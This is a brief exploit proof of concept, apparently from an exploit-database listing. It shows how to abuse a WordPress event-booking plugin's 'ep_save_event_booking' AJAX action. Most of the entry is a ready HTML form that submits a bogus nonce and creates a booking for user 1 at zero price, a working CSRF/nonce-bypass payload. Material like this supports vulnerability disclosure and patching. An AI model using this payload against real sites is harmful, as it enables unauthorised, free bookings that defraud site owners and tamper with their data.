## https://sploitus.com/exploit?id=WPEX-ID:CE564628-3D15-4BC5-8B8E-60B71786AC19
Create an Event, noting its ID. Add a ticket type to the Event (the details don't matter).
As a logged-in user, visit a page with the following form, replace the event ID, and submit the form. Note that a new Booking is created, despite the incorrect nonce.
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="ep_save_event_booking" />
<textarea name="data">
ep_event_booking_event_id=EVENT_ID&ep_event_booking_user_id=1&ep_event_booking_total_price=0&ep_event_booking_total_tickets=1&ep_save_event_booking_nonce=1234
</textarea>
<input type="submit" value="Submit request" />
</form>
</body>
</html>